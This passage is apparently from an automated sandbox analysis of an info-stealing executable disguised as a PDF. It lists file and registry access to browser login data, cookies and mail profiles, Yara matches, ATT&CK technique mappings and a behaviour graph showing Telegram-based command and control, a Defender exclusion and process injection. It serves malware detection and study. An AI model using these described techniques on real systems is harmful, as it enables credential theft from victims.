                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Users\user\AppData\Roaming\QeSBxb.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Users\user\AppData\Roaming\QeSBxb.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 2788, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3882761665.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 2788, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 2788, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QeSBxb.exe PID: 4568, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  111
                  Process Injection
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  1
                  Query Registry
                  Remote Services1
                  Email Collection
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading
                  1
                  Scheduled Task/Job
                  11
                  Disable or Modify Tools
                  LSASS Memory11
                  Security Software Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading
                  31
                  Virtualization/Sandbox Evasion
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin Shares1
                  Data from Local System
                  3
                  Ingress Tool Transfer
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection
                  NTDS31
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeylogging14
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                  Software Packing
                  Cached Domain Credentials1
                  System Network Configuration Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync1
                  File and Directory Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                  System Information Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541879 Sample: Scan_Rev 20220731_PO&OC#88S... Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 44 reallyfreegeoip.org 2->44 46 api.telegram.org 2->46 48 2 other IPs or domains 2->48 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Sigma detected: Scheduled temp file as task from temp location 2->60 66 14 other signatures 2->66 8 Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe 7 2->8         started        12 QeSBxb.exe 5 2->12         started        signatures3 62 Tries to detect the country of the analysis system (by using the IP) 44->62 64 Uses the Telegram API (likely for C&C communication) 46->64 process4 file5 36 C:\Users\user\AppData\Roaming\QeSBxb.exe, PE32 8->36 dropped 38 C:\Users\user\...\QeSBxb.exe:Zone.Identifier, ASCII 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmpC1CB.tmp, XML 8->40 dropped 42 Scan_Rev 20220731_...3882874_PDF.exe.log, ASCII 8->42 dropped 68 Adds a directory exclusion to Windows Defender 8->68 70 Injects a PE file into a foreign processes 8->70 14 Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 schtasks.exe 1 8->20         started        22 Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe 8->22         started        72 Multi AV Scanner detection for dropped file 12->72 74 Machine Learning detection for dropped file 12->74 24 QeSBxb.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 50 api.telegram.org 